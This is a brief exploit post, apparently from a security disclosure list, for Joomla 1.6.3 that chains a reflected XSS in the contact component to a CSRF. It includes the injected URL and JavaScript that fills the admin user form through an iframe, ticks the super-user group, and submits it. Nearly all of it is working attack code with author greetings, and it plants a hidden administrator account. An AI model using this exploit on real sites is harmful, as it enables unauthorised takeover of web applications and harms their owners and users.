This vulnerability takes advantage of the recent Joomla 1.6.3 XSS vulnerability ( http://seclists.org/fulldisclosure/2011/Jun/519 ) to execute a CSRF vulnerability to create a superuser account.  /* joom163.js Joomla 1.6.3 XSS -> CSRF Exploit Greetz to Shardy, Xires & Stacy, Rage, coorslitedude, Nothingness, MaXe Coded By: Connection Vuln Link: index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";'>"> */ document.writeln(''); function read() { var name="Test"; var username="haxx"; var password="test123"; var email="fake _at_ gmail.com"; document.getElementById("iframe").contentDocument.forms[0].jform_name.value = name; document.getElementById("iframe").contentDocument.forms[0].jform_username.value = username; document.getElementById("iframe").contentDocument.forms[0].jform_password.value = password; document.getElementById("iframe").contentDocument.forms[0].jform_password2.value = password; document.getElementById("iframe").contentDocument.forms[0].jform_email.value = email; document.getElementById("iframe").contentDocument.forms[0].getElementById("1group_8").checked=true; document.getElementById("iframe").contentDocument.getElementsByTagName("a")[11].onclick(); }